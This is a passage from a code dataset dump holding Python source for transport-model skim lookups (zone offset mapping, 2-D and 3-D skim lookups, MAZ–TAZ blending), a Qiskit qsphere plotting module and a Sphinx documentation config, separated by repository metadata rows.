pandas series with zone_id index and skim array offset values. Ordinarily, index is just range(0, omx_size)
if series has duplicate offset values, this can map multiple zone_ids to a single skim array index
(e.g. can map maz zone_ids to corresponding taz skim offset)
"""
def __init__(self, offset_int=None, offset_list=None, offset_series=None):
self.offset_int = self.offset_series = None
assert (offset_int is not None) + (offset_list is not None) + (offset_series is not None) <= 1
if offset_int is not None:
self.set_offset_int(offset_int)
elif offset_list is not None:
self.set_offset_list(offset_list)
elif offset_series is not None:
self.set_offset_series(offset_series)
def print_offset(self, message=''):
assert (self.offset_int is not None) or (self.offset_series is not None)
if self.offset_int is not None:
print(f"{message} offset_int: {self.offset_int}")
elif self.offset_series is not None:
print(f"{message} offset_series:\n {self.offset_series}")
else:
print(f"{message} offset: None")
def set_offset_series(self, offset_series):
"""
Parameters
----------
offset_series: pandas.Series
series with zone_id index and skim array offset values (can map many zone_ids to skim array index)
"""
assert isinstance(offset_series, pd.Series)
self.offset_series = offset_series
self.offset_int = None
def set_offset_list(self, offset_list):
"""
Convenience method to set offset_series using an integer list the same size as target skim dimension
with implicit skim index mapping (e.g. an omx mapping as returned by omx_file.mapentries)
Parameters
----------
offset_list : list of int
"""
assert isinstance(offset_list, list) or isinstance(offset_list, np.ndarray)
if isinstance(offset_list, np.ndarray):
offset_list = list(offset_list)
        # - for performance, check if this is a simple range that can be represented by an int offset
first_offset = offset_list[0]
if (offset_list == list(range(first_offset, len(offset_list)+first_offset))):
offset_int = -1 * first_offset
self.set_offset_int(offset_int)
else:
offset_series = pd.Series(data=list(range(len(offset_list))), index=offset_list)
self.set_offset_series(offset_series)
def set_offset_int(self, offset_int):
"""
specify int offset which when added to zone_id yields skim array index (e.g. -1 to map 1-based to 0-based)
Parameters
----------
offset_int : int
"""
# should be some duck subtype of integer (but might be, say, numpy.int64)
assert int(offset_int) == offset_int
self.offset_int = int(offset_int)
self.offset_series = None
def map(self, zone_ids):
"""
map zone_ids to skim indexes
Parameters
----------
zone_ids : list-like (numpy.ndarray, pandas.Int64Index, or pandas.Series)
Returns
-------
offsets : numpy array of int
"""
if self.offset_series is not None:
assert(self.offset_int is None)
assert isinstance(self.offset_series, pd.Series)
# FIXME - faster to use series.map if zone_ids is a series?
offsets = quick_loc_series(zone_ids, self.offset_series).fillna(NOT_IN_SKIM_ZONE_ID).astype(int)
elif self.offset_int:
assert (self.offset_series is None)
# apply integer offset, but map NOT_IN_SKIM_ZONE_ID to self
offsets = np.where(zone_ids == NOT_IN_SKIM_ZONE_ID, NOT_IN_SKIM_ZONE_ID, zone_ids + self.offset_int)
else:
offsets = zone_ids
return offsets
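# A minimal usage sketch of OffsetMapper (illustrative, not part of the original
# module): a contiguous zone numbering collapses to a fast int offset, while an
# arbitrary numbering falls back to an offset series.
def _offset_mapper_example():
    om_int = OffsetMapper(offset_int=-1)  # classic 1-based zone ids -> 0-based index
    assert (om_int.map(np.array([1, 2, 3])) == np.array([0, 1, 2])).all()
    om_range = OffsetMapper(offset_list=[100, 101, 102])  # contiguous: collapses to offset_int -100
    assert (om_range.map(np.array([102, 100])) == np.array([2, 0])).all()
    om_sparse = OffsetMapper(offset_list=[5, 9, 12])  # non-contiguous: uses an offset series
    assert (om_sparse.map(pd.Series([12, 5])) == np.array([2, 0])).all()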
class SkimDict(object):
"""
A SkimDict object is a wrapper around a dict of multiple skim objects,
where each object is identified by a key.
Note that keys are either strings or tuples of two strings (to support stacking of skims.)
"""
def __init__(self, skim_tag, skim_info, skim_data):
logger.info(f"SkimDict init {skim_tag}")
self.skim_tag = skim_tag
self.skim_info = skim_info
self.usage = set() # track keys of skims looked up
self.offset_mapper = self._offset_mapper() # (in function so subclass can override)
self.omx_shape = skim_info.omx_shape
self.skim_data = skim_data
self.dtype = np.dtype(skim_info.dtype_name) # so we can coerce if we have missing values
# - skim_dim3 dict maps key1 to dict of key2 absolute offsets into block
# DRV_COM_WLK_BOARDS: {'MD': 4, 'AM': 3, 'PM': 5}, ...
self.skim_dim3 = {}
for skim_key, offset in skim_info.block_offsets.items():
if isinstance(skim_key, tuple):
key1, key2 = skim_key
self.skim_dim3.setdefault(key1, {})[key2] = offset
logger.info(f"SkimDict.build_3d_skim_block_offset_table registered {len(self.skim_dim3)} 3d keys")
def _offset_mapper(self):
"""
Return an OffsetMapper to set self.offset_mapper for use with skims
This allows subclasses (e.g. MazSkimDict) to 'tweak' the parent offset mapper.
Returns
-------
OffsetMapper
"""
offset_mapper = OffsetMapper()
if self.skim_info.offset_map is not None:
offset_mapper.set_offset_list(offset_list=self.skim_info.offset_map)
else:
# assume this is a one-based skim map
offset_mapper.set_offset_int(-1)
return offset_mapper
@property
def zone_ids(self):
"""
Return list of zone_ids we grok in skim index order
Returns
-------
ndarray of int domain zone_ids
"""
if self.offset_mapper.offset_series is not None:
ids = self.offset_mapper.offset_series.index.values
else:
ids = np.array(range(self.omx_shape[0])) - self.offset_mapper.offset_int
return ids
def get_skim_usage(self):
"""
return set of keys of skims looked up. e.g. {'DIST', 'SOV'}
Returns
-------
set:
"""
return self.usage
def _lookup(self, orig, dest, block_offsets):
"""
        Return a list of skim values at orig/dest for the skim(s) at block_offset in skim_data
        Supplying a single int block_offset makes the lookup 2-D.
        Supplying a list of block_offsets (same length as orig and dest lists) allows 3-D lookup.
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
block_offsets: int or list of dim3 blockoffsets for the od pairs
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
# fixme - remove?
assert not (np.isnan(orig) | np.isnan(dest)).any()
# only working with numpy in here
orig = np.asanyarray(orig).astype(int)
dest = np.asanyarray(dest).astype(int)
mapped_orig = self.offset_mapper.map(orig)
mapped_dest = self.offset_mapper.map(dest)
if ROW_MAJOR_LAYOUT:
result = self.skim_data[block_offsets, mapped_orig, mapped_dest]
else:
result = self.skim_data[mapped_orig, mapped_dest, block_offsets]
# FIXME - should return nan if not in skim (negative indices wrap around)
in_skim = (mapped_orig >= 0) & (mapped_orig < self.omx_shape[0]) & \
(mapped_dest >= 0) & (mapped_dest < self.omx_shape[1])
# if not ((in_skim | (orig == NOT_IN_SKIM_ZONE_ID) | (dest == NOT_IN_SKIM_ZONE_ID)).all()):
# print(f"orig\n{orig}")
# print(f"dest\n{dest}")
# print(f"in_skim\n{in_skim}")
# check for bad indexes (other than NOT_IN_SKIM_ZONE_ID)
assert (in_skim | (orig == NOT_IN_SKIM_ZONE_ID) | (dest == NOT_IN_SKIM_ZONE_ID)).all(), \
f"{(~in_skim).sum()} od pairs not in skim"
if not in_skim.all():
result = np.where(in_skim, result, NOT_IN_SKIM_NAN).astype(self.dtype)
return result
def lookup(self, orig, dest, key):
"""
        Return a list of skim values at orig/dest from the skim with the specified key (e.g. 'DIST')
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
key: str
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
self.usage.add(key)
block_offset = self.skim_info.block_offsets.get(key)
assert block_offset is not None, f"SkimDict lookup key '{key}' not in skims"
try:
result = self._lookup(orig, dest, block_offset)
except Exception as err:
logger.error("SkimDict lookup error: %s: %s", type(err).__name__, str(err))
logger.error(f"key {key}")
logger.error(f"orig max {orig.max()} min {orig.min()}")
logger.error(f"dest max {dest.max()} min {dest.min()}")
raise err
return result
def lookup_3d(self, orig, dest, dim3, key):
"""
3D lookup of skim values of skims(s) at orig/dest for stacked skims indexed by dim3 selector
The idea is that skims may be stacked in groups with a base key and a dim3 key (usually a time of day key)
        On import (from omx) skim stacks are represented by base and dim3 keys separated by a double underscore
e.g. DRV_COM_WLK_BOARDS__AM indicates base skim key DRV_COM_WLK_BOARDS with a time of day (dim3) of 'AM'
        Since all the skims are stored in a single contiguous 3D array, we can use the dim3 key as a third index
and thus rapidly get skim values for a list of (orig, dest, tod) tuples using index arrays ('fancy indexing')
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
        dim3: list with one dim3 key (e.g. time of day) for each orig/dest pair
        key: str base skim key
Returns
-------
Numpy.ndarray: list of skim values
"""
self.usage.add(key) # should we keep usage stats by (key, dim3)?
assert key in self.skim_dim3, f"3d skim key {key} not in skims."
# map dim3 to block_offsets
skim_keys_to_indexes = self.skim_dim3[key]
# skim_indexes = dim3.map(skim_keys_to_indexes).astype('int')
try:
block_offsets = np.vectorize(skim_keys_to_indexes.get)(dim3) # this should be faster than map
result = self._lookup(orig, dest, block_offsets)
except Exception as err:
logger.error("SkimDict lookup_3d error: %s: %s", type(err).__name__, str(err))
logger.error(f"key {key}")
logger.error(f"orig max {orig.max()} min {orig.min()}")
logger.error(f"dest max {dest.max()} min {dest.min()}")
logger.error(f"skim_keys_to_indexes: {skim_keys_to_indexes}")
logger.error(f"dim3 {np.unique(dim3)}")
logger.error(f"dim3 block_offsets {np.unique(block_offsets)}")
raise err
return result
def wrap(self, orig_key, dest_key):
"""
return a SkimWrapper for self
"""
return SkimWrapper(self, orig_key, dest_key)
def wrap_3d(self, orig_key, dest_key, dim3_key):
"""
return a SkimWrapper for self
"""
return Skim3dWrapper(self, orig_key, dest_key, dim3_key)
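# A minimal sketch (not part of the original module) of the fancy indexing that
# SkimDict._lookup relies on: with ROW_MAJOR_LAYOUT, stacked skims form a 3-D
# array indexed as skim_data[block, orig, dest], so a per-row block offset
# (e.g. a time-of-day key mapped to an int) selects a different skim per od pair.
def _stacked_skim_indexing_example():
    data = np.arange(2 * 3 * 3).reshape(2, 3, 3)  # two 3x3 skims stacked on axis 0
    orig = np.array([0, 1, 2])
    dest = np.array([2, 0, 1])
    block_offsets = np.array([0, 1, 0])  # e.g. dim3 keys 'AM', 'MD', 'AM'
    result = data[block_offsets, orig, dest]
    assert (result == np.array([2, 12, 7])).all()
    return result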
class SkimWrapper(object):
"""
A SkimWrapper object is an access wrapper around a SkimDict of multiple skim objects,
where each object is identified by a key.
    This is just a way to simplify expression files by hiding the orig and dest arguments
when the orig and dest vectors are in a dataframe with known column names (specified at init time)
The dataframe is identified by set_df because it may not be available (e.g. due to chunking)
at the time the SkimWrapper is instantiated.
When the user calls skims[key], key is an identifier for which skim
to use, and the object automatically looks up impedances of that skim
using the specified orig_key column in df as the origin and
the dest_key column in df as the destination. In this way, the user
does not do the O-D lookup by hand and only specifies which skim to use
for this lookup. This is the only purpose of this object: to
abstract away the O-D lookup and use skims by specifying which skim
to use in the expressions.
Note that keys are either strings or tuples of two strings (to support stacking of skims.)
"""
def __init__(self, skim_dict, orig_key, dest_key):
"""
Parameters
----------
skim_dict: SkimDict
orig_key: str
name of column in dataframe to use as implicit orig for lookups
dest_key: str
name of column in dataframe to use as implicit dest for lookups
"""
self.skim_dict = skim_dict
self.orig_key = orig_key
self.dest_key = dest_key
self.df = None
def set_df(self, df):
"""
Set the dataframe
Parameters
----------
df : DataFrame
The dataframe which contains the origin and destination ids
Returns
-------
        self (to facilitate chaining)
"""
assert self.orig_key in df, f"orig_key '{self.orig_key}' not in df columns: {list(df.columns)}"
assert self.dest_key in df, f"dest_key '{self.dest_key}' not in df columns: {list(df.columns)}"
self.df = df
return self
def lookup(self, key, reverse=False):
"""
Generally not called by the user - use __getitem__ instead
Parameters
----------
key : hashable
The key (identifier) for this skim object
        reverse : bool (optional)
            reverse=False (default) looks up the standard origin-destination skim value
            reverse=True looks up the destination-origin skim value
Returns
-------
impedances: pd.Series
A Series of impedances which are elements of the Skim object and
with the same index as df
"""
assert self.df is not None, "Call set_df first"
if reverse:
s = self.skim_dict.lookup(self.df[self.dest_key], self.df[self.orig_key], key)
else:
s = self.skim_dict.lookup(self.df[self.orig_key], self.df[self.dest_key], key)
return pd.Series(s, index=self.df.index)
def reverse(self, key):
"""
return skim value in reverse (d-o) direction
"""
return self.lookup(key, reverse=True)
def max(self, key):
"""
return max skim value in either o-d or d-o direction
"""
assert self.df is not None, "Call set_df first"
s = np.maximum(
self.skim_dict.lookup(self.df[self.dest_key], self.df[self.orig_key], key),
self.skim_dict.lookup(self.df[self.orig_key], self.df[self.dest_key], key)
)
return pd.Series(s, index=self.df.index)
def __getitem__(self, key):
"""
Get the lookup for an available skim object (df and orig/dest and column names implicit)
Parameters
----------
key : hashable
The key (identifier) for the skim object
Returns
-------
impedances: pd.Series with the same index as df
            A Series of impedance values from the single Skim with specified key, indexed by orig/dest pair
"""
return self.lookup(key)
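# A minimal usage sketch (illustrative; assumes `skim_dict` is a loaded SkimDict
# that contains a 'DIST' skim): wrap the dict once with the df column names, then
# look skims up by key from inside vectorized expressions.
def _skim_wrapper_usage_example(skim_dict):
    df = pd.DataFrame({'origin': [1, 2], 'destination': [2, 1]})
    skims = skim_dict.wrap('origin', 'destination').set_df(df)
    return skims['DIST']  # pd.Series of DIST values aligned with df.index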
class Skim3dWrapper(object):
"""
This works the same as a SkimWrapper above, except the third dim3 is also supplied,
and a 3D lookup is performed using orig, dest, and dim3.
Parameters
----------
skims: Skims
This is the Skims object to wrap
dim3_key : str
This identifies the column in the dataframe which is used to
        select among Skim objects using the SECOND item in each tuple (see
above for a more complete description)
"""
def __init__(self, skim_dict, orig_key, dest_key, dim3_key):
"""
Parameters
----------
skim_dict: SkimDict
orig_key: str
name of column of zone_ids in dataframe to use as implicit orig for lookups
dest_key: str
name of column of zone_ids in dataframe to use as implicit dest for lookups
dim3_key: str
name of column of dim3 keys in dataframe to use as implicit third dim3 key for 3D lookups
e.g. string column with time_of_day keys (such as 'AM', 'MD', 'PM', etc.)
"""
self.skim_dict = skim_dict
self.orig_key = orig_key
self.dest_key = dest_key
self.dim3_key = dim3_key
self.df = None
def set_df(self, df):
"""
Set the dataframe
Parameters
----------
df : DataFrame
The dataframe which contains the orig, dest, and dim3 values
Returns
-------
        self (to facilitate chaining)
"""
assert self.orig_key in df, f"orig_key '{self.orig_key}' not in df columns: {list(df.columns)}"
assert self.dest_key in df, f"dest_key '{self.dest_key}' not in df columns: {list(df.columns)}"
assert self.dim3_key in df, f"dim3_key '{self.dim3_key}' not in df columns: {list(df.columns)}"
self.df = df
return self
def __getitem__(self, key):
"""
Get the lookup for an available skim object (df and orig/dest/dim3 and column names implicit)
Parameters
----------
key : hashable
The key (identifier) for this skim object
Returns
-------
impedances: pd.Series with the same index as df
            A Series of impedance values from the set of skims with specified base key, indexed by orig/dest/dim3
"""
assert self.df is not None, "Call set_df first"
orig = self.df[self.orig_key].astype('int')
dest = self.df[self.dest_key].astype('int')
dim3 = self.df[self.dim3_key]
skim_values = self.skim_dict.lookup_3d(orig, dest, dim3, key)
return pd.Series(skim_values, self.df.index)
class MazSkimDict(SkimDict):
"""
MazSkimDict provides a facade that allows skim-like lookup by maz orig,dest zone_id
when there are often too many maz zones to create maz skims.
Dependencies: network_los.load_data must have already loaded: taz skim_dict, maz_to_maz_df, and maz_taz_df
    It performs lookups from a sparse list of maz-maz od pairs on selected attributes (e.g. WALKDIST)
    where accuracy for nearby od pairs is critical, and is backed by a fallback taz skim dict
    to return values for more distant pairs (or for skims that are not attributes in the maz-maz table).
"""
def __init__(self, skim_tag, network_los, taz_skim_dict):
"""
we need network_los because we have dependencies on network_los.load_data (e.g. maz_to_maz_df, maz_taz_df,
and the fallback taz skim_dict)
We require taz_skim_dict as an explicit parameter to emphasize that we are piggybacking on taz_skim_dict's
preexisting skim_data and skim_info, rather than instantiating duplicate copies thereof.
Note, however, that we override _offset_mapper (called by super.__init__) to create our own
custom self.offset_mapper that maps directly from MAZ zone_ids to TAZ skim array indexes
Parameters
----------
skim_tag: str
network_los: Network_LOS
taz_skim_dict: SkimDict
"""
self.network_los = network_los
super().__init__(skim_tag, taz_skim_dict.skim_info, taz_skim_dict.skim_data)
        assert self.offset_mapper is not None  # should have been set by our _offset_mapper override
self.dtype = np.dtype(self.skim_info.dtype_name)
self.base_keys = taz_skim_dict.skim_info.base_keys
self.sparse_keys = list(set(network_los.maz_to_maz_df.columns) - {'OMAZ', 'DMAZ'})
self.sparse_key_usage = set()
def _offset_mapper(self):
"""
return an OffsetMapper to map maz zone_ids to taz skim indexes
Specifically, an offset_series with MAZ zone_id index and TAZ skim array offset values
        This is called by super().__init__ AFTER self.network_los has been set in MazSkimDict.__init__
Returns
-------
OffsetMapper
"""
# start with a series with MAZ zone_id index and TAZ zone id values
maz_to_taz = self.network_los.maz_taz_df[['MAZ', 'TAZ']].set_index('MAZ').sort_values(by='TAZ').TAZ
# use taz offset_mapper to create series mapping directly from MAZ to TAZ skim index
taz_offset_mapper = super()._offset_mapper()
maz_to_skim_offset = taz_offset_mapper.map(maz_to_taz)
        if isinstance(maz_to_skim_offset, np.ndarray):
            # OffsetMapper.map returns a bare ndarray (dropping the MAZ index) when the
            # taz mapper uses an int offset, so restore the MAZ zone_id index here
            maz_to_skim_offset = pd.Series(maz_to_skim_offset, maz_to_taz.index)
# MAZ
# 19062 330 <- The TAZ would be, say, 331, and the offset is 330
# 8429 330
# 9859 331
assert isinstance(maz_to_skim_offset, np.ndarray) or isinstance(maz_to_skim_offset, pd.Series)
if isinstance(maz_to_skim_offset, pd.Series):
offset_mapper = OffsetMapper(offset_series=maz_to_skim_offset)
elif isinstance(maz_to_skim_offset, np.ndarray):
offset_mapper = OffsetMapper(offset_list=maz_to_skim_offset)
return offset_mapper
def get_skim_usage(self):
return self.sparse_key_usage.union(self.usage)
def sparse_lookup(self, orig, dest, key):
"""
        Get impedance values for a set of origin, destination pairs.
Parameters
----------
orig : 1D array
dest : 1D array
key : str
skim key
Returns
-------
values : numpy 1D array
"""
self.sparse_key_usage.add(key)
max_blend_distance = self.network_los.max_blend_distance.get(key, 0)
if max_blend_distance == 0:
blend_distance_skim_name = None
else:
blend_distance_skim_name = self.network_los.blend_distance_skim_name
# fixme - remove?
assert not (np.isnan(orig) | np.isnan(dest)).any()
# we want values from mazpairs, where we have them
values = self.network_los.get_mazpairs(orig, dest, key)
is_nan = np.isnan(values)
if max_blend_distance > 0:
# print(f"{is_nan.sum()} nans out of {len(is_nan)} for key '{self.key}")
# print(f"blend_distance_skim_name {self.blend_distance_skim_name}")
backstop_values = super().lookup(orig, dest, key)
# get distance skim if a different key was specified by blend_distance_skim_name
if (blend_distance_skim_name != key):
distance = self.network_los.get_mazpairs(orig, dest, blend_distance_skim_name)
else:
distance = values
# for distances less than max_blend_distance, we blend maz-maz and skim backstop values
# shorter distances have less fractional backstop, and more maz-maz
# beyond max_blend_distance, just use the skim values
backstop_fractions = np.minimum(distance / max_blend_distance, 1)
values = np.where(is_nan,
backstop_values,
backstop_fractions * backstop_values + (1 - backstop_fractions) * values)
elif is_nan.any():
# print(f"{is_nan.sum()} nans out of {len(is_nan)} for key '{self.key}")
if key in self.base_keys:
# replace nan values using simple backstop without blending
backstop_values = super().lookup(orig, dest, key)
values = np.where(is_nan, backstop_values, values)
else:
# FIXME - if no backstop skim, then return 0 (which conventionally means "not available")
values = np.where(is_nan, 0, values)
# want to return same type as backstop skim
values = values.astype(self.dtype)
return values
def lookup(self, orig, dest, key):
"""
        Return a list of skim values at orig/dest from the skim with the specified key (e.g. 'DIST')
Look up in sparse table (backed by taz skims) if key is a sparse_key, otherwise look up in taz skims
For taz skim lookups, the offset_mapper will convert maz zone_ids directly to taz skim indexes.
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
key: str
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
if key in self.sparse_keys:
# logger.debug(f"MazSkimDict using SparseSkimDict for key '{key}'")
values = self.sparse_lookup(orig, dest, key)
else:
values = super().lookup(orig, dest, key)
return values
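# A minimal sketch (not part of the original module) of the distance blending rule
# used by MazSkimDict.sparse_lookup above: within max_blend_distance the result is
# a distance-weighted mix of sparse maz-maz values and taz backstop values, beyond
# it the backstop is used outright, and NaN maz-maz values always fall back to the
# backstop.
def _blend_example(values, backstop_values, distance, max_blend_distance):
    is_nan = np.isnan(values)
    backstop_fractions = np.minimum(distance / max_blend_distance, 1)
    return np.where(is_nan,
                    backstop_values,
                    backstop_fractions * backstop_values + (1 - backstop_fractions) * values)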
class DataFrameMatrix(object):
"""
Utility class to allow a pandas dataframe to be treated like a 2-D array,
indexed by rowid, colname
    For use in vectorized expressions where the desired values depend on both a row and a
    column selector, e.g. size_terms.get(df.dest_taz, df.purpose)
::
df = pd.DataFrame({'a': [1,2,3,4,5], 'b': [10,20,30,40,50]}, index=[100,101,102,103,104])
dfm = DataFrameMatrix(df)
dfm.get(row_ids=[100,100,103], col_ids=['a', 'b', 'a'])
returns [1, 10, 4]
"""
def __init__(self, df):
"""
Parameters
----------
df - pandas dataframe of uniform type
"""
self.df = df
self.data = df.values
self.offset_mapper = OffsetMapper()
self.offset_mapper.set_offset_list(list(df.index))
self.cols_to_indexes = {k: v for v, k in enumerate(df.columns)}
def get(self, row_ids, col_ids):
"""
Parameters
----------
row_ids - list of row_ids (df index values)
col_ids - list of column names, one per row_id,
specifying column from which the value for that row should be retrieved
Returns
-------
series with one row per row_id, with the value from the column specified in col_ids
"""
# col_indexes = segments.map(self.cols_to_indexes).astype('int')
# this should be faster than map
col_indexes = np.vectorize(self.cols_to_indexes.get)(col_ids)
row_indexes = self.offset_mapper.map(np.asanyarray(row_ids))
not_in_skim = (row_indexes == NOT_IN_SKIM_ZONE_ID)
if not_in_skim.any():
logger.warning(f"DataFrameMatrix: {not_in_skim.sum()} row_ids of {len(row_ids)} not in skim.")
not_in_skim = not_in_skim.values
logger.warning(f"row_ids: {row_ids[not_in_skim]}")
logger.warning(f"col_ids: {col_ids[not_in_skim]}")
raise RuntimeError(f"DataFrameMatrix: {not_in_skim.sum()} row_ids of {len(row_ids)} not in skim.")
assert (row_indexes >= 0).all(), f"{row_indexes}"
result = self.data[row_indexes, col_indexes]
# FIXME - if ids (or col_ids?) is a series, return series with same index?
if isinstance(row_ids, pd.Series):
result = pd.Series(result, index=row_ids.index)
return result
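# Runnable version of the DataFrameMatrix docstring example above (illustrative only).
def _dataframe_matrix_example():
    df = pd.DataFrame({'a': [1, 2, 3, 4, 5], 'b': [10, 20, 30, 40, 50]},
                      index=[100, 101, 102, 103, 104])
    dfm = DataFrameMatrix(df)
    result = dfm.get(row_ids=pd.Series([100, 100, 103]), col_ids=pd.Series(['a', 'b', 'a']))
    assert list(result) == [1, 10, 4]
    return result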
| 35.174877
| 118
| 0.623906
|
284beb5dad4ed08c4cd4b6eb8643f394f5b2233a
| 5,728
|
py
|
Python
|
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
kifumi/qiskit-terra
|
203fca6d694a18824a6b12cbabd3dd2c64dd12ae
|
[
"Apache-2.0"
] | 1
|
2018-11-01T01:35:43.000Z
|
2018-11-01T01:35:43.000Z
|
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
a-amaral/qiskit-terra
|
e73beba1e68de2617046a7e1e9eeac375b61de81
|
[
"Apache-2.0"
] | null | null | null |
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
a-amaral/qiskit-terra
|
e73beba1e68de2617046a7e1e9eeac375b61de81
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""
Qsphere visualization
"""
from functools import reduce
from string import Template
import sys
import time
import re
import numpy as np
from scipy import linalg
if ('ipykernel' in sys.modules) and ('spyder' not in sys.modules):
try:
from IPython.core.display import display, HTML
except ImportError:
print("Error importing IPython.core.display")
def iplot_qsphere(rho, options=None):
""" Create a Q sphere representation.
Graphical representation of the input array, using a Q sphere for each
eigenvalue.
Args:
rho (array): Density matrix (complex array)
options (dict): Representation settings containing
- width (integer): graph horizontal size
- height (integer): graph vertical size
"""
# HTML
html_template = Template("""
<p>
<div id="content_$divNumber" style="position: absolute; z-index: 1;">
<div id="qsphere_$divNumber"></div>
</div>
</p>
""")
# JavaScript
javascript_template = Template("""
<script>
requirejs.config({
paths: {
qVisualization: "https://qvisualization.mybluemix.net/q-visualizations"
}
});
require(["qVisualization"], function(qVisualizations) {
data = $data;
qVisualizations.plotState("qsphere_$divNumber",
"qsphere",
data,
$options);
});
</script>
""")
if not options:
options = {}
qspheres_data = []
# Process data and execute
num = int(np.log2(len(rho)))
    # get the eigenvectors and eigenvalues
weig, stateall = linalg.eigh(rho)
for _ in range(2**num):
# start with the max
probmix = weig.max()
prob_location = weig.argmax()
if probmix > 0.001:
# print("The " + str(k) + "th eigenvalue = " + str(probmix))
            # get the eigenvector for the max eigenvalue
state = stateall[:, prob_location]
loc = np.absolute(state).argmax()
            # get the element location closest to the lowest binary representation
for j in range(2**num):
test = np.absolute(np.absolute(state[j]) -
np.absolute(state[loc]))
if test < 0.001:
loc = j
break
# remove the global phase
angles = (np.angle(state[loc]) + 2 * np.pi) % (2 * np.pi)
angleset = np.exp(-1j*angles)
state = angleset*state
            state = state.flatten()  # flatten() returns a copy; assign it or it is a no-op
spherepoints = []
for i in range(2**num):
# get x,y,z points
element = bin(i)[2:].zfill(num)
weight = element.count("1")
number_of_divisions = n_choose_k(num, weight)
weight_order = bit_string_index(element)
angle = weight_order * 2 * np.pi / number_of_divisions
zvalue = -2 * weight / num + 1
xvalue = np.sqrt(1 - zvalue**2) * np.cos(angle)
yvalue = np.sqrt(1 - zvalue**2) * np.sin(angle)
# get prob and angle - prob will be shade and angle color
prob = np.real(np.dot(state[i], state[i].conj()))
angles = (np.angle(state[i]) + 2 * np.pi) % (2 * np.pi)
qpoint = {
'x': xvalue,
'y': yvalue,
'z': zvalue,
'prob': prob,
'phase': angles
}
spherepoints.append(qpoint)
# Associate all points to one sphere
sphere = {
'points': spherepoints,
'eigenvalue': probmix
}
# Add sphere to the spheres array
qspheres_data.append(sphere)
weig[prob_location] = 0
div_number = str(time.time())
div_number = re.sub('[.]', '', div_number)
html = html_template.substitute({
'divNumber': div_number
})
javascript = javascript_template.substitute({
'data': qspheres_data,
'divNumber': div_number,
'options': options
})
display(HTML(html + javascript))
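# Illustrative helper (not part of the original API): the qsphere coordinates of a
# single basis state, mirroring the geometry of the loop above -- latitude is set
# by the bit-string weight, and equal-weight states are spread evenly in longitude.
def _qsphere_point(num, i):
    element = bin(i)[2:].zfill(num)
    weight = element.count("1")
    angle = bit_string_index(element) * 2 * np.pi / n_choose_k(num, weight)
    zvalue = -2 * weight / num + 1
    radius = np.sqrt(1 - zvalue**2)
    return radius * np.cos(angle), radius * np.sin(angle), zvalue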
def n_choose_k(n, k):
"""Return the number of combinations for n choose k.
Args:
n (int): the total number of options .
k (int): The number of elements.
Returns:
int: returns the binomial coefficient
"""
if n == 0:
return 0
return reduce(lambda x, y: x * y[0] / y[1],
zip(range(n - k + 1, n + 1),
range(1, k + 1)), 1)
def bit_string_index(text):
"""Return the index of a string of 0s and 1s."""
n = len(text)
k = text.count("1")
assert text.count("0") == n - k, "s must be a string of 0 and 1"
ones = [pos for pos, char in enumerate(text) if char == "1"]
return lex_index(n, k, ones)
def lex_index(n, k, lst):
"""Return the lex index of a combination..
Args:
n (int): the total number of options .
k (int): The number of elements.
lst (list): list
Returns:
int: returns int index for lex order
"""
assert len(lst) == k, "list should have length k"
comb = list(map(lambda x: n - 1 - x, lst))
dualm = sum([n_choose_k(comb[k - 1 - i], i + 1) for i in range(k)])
return int(dualm)
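# Worked check (illustrative): the C(4, 2) = 6 four-bit strings of weight two are
# indexed in lexicographic order, which is what spreads equal-weight basis states
# evenly around each latitude of the qsphere.
def _bit_string_index_example():
    ordering = ['0011', '0101', '0110', '1001', '1010', '1100']
    assert [bit_string_index(s) for s in ordering] == list(range(6))
    return ordering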
| 29.525773
| 87
| 0.523568
|
7fd5ae41a45a871cfd0172a5717c98e30df2d4de
| 1,983
|
py
|
Python
|
docs_src/source/conf.py
|
introkun/qt-range-slider
|
7c1500b7bfd6a4433ab474974ed2148f4d570516
|
[
"MIT"
] | 1
|
2021-09-29T14:33:27.000Z
|
2021-09-29T14:33:27.000Z
|
docs_src/source/conf.py
|
OBITORASU/qt-range-slider
|
a0e5b4137404acecd771928587a57c1d7a2168d2
|
[
"MIT"
] | 41
|
2021-01-20T21:14:09.000Z
|
2022-03-28T05:22:01.000Z
|
docs_src/source/conf.py
|
OBITORASU/qt-range-slider
|
a0e5b4137404acecd771928587a57c1d7a2168d2
|
[
"MIT"
] | 2
|
2021-01-22T07:19:37.000Z
|
2021-04-20T16:20:01.000Z
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
sys.setrecursionlimit(1500)
# -- Project information -----------------------------------------------------
project = 'qt-range-slider'
copyright = '2021, Sergey G'
author = 'Sergey G'
# The full version, including alpha/beta/rc tags
release = '0.1.5'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 34.789474
| 80
| 0.66818
|
c27cbaedf07e56f7500864ba7d8946d55b6b8239
| 219
|
py
